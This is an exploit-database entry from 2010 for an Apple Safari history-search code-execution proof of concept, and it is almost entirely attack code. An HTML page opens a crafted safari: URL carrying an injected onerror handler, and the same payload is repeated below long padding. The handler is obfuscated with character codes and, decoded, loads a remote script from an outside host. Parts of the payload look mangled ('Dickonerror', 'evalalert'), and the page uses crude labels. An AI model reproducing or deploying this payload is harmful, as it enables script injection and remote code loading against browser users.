Apple Safari history search <= Code Execution Exploit PoC

2010-03-13T00:00:00
ID 1337DAY-ID-9645
Type zdt
Reporter eidelweiss
Modified 2010-03-13T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            =========================================================
Apple Safari history search <= Code Execution Exploit PoC
=========================================================

<!--
Copyright (C) 2009-2010 firelinking by eidelweiss
Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u)
Credit: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , YOGYACARDERLINK
This P0C made for Educational Purpose only
Author Will Be not responsible For Any Damage.
-->

<html>
<script>
function Dick() {
  window.open('safari:historysearch?q=%2A"><img src=\'Dick\' Dickonerror='evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",6666);
}
</script>
<body scrolling="no">
<a href="#" onclick="Dick()">Suck Please...</a>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<<img src=\'Dick\' Dickonerror='evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'>
</body>
</html>



#  0day.today [2018-03-19]  #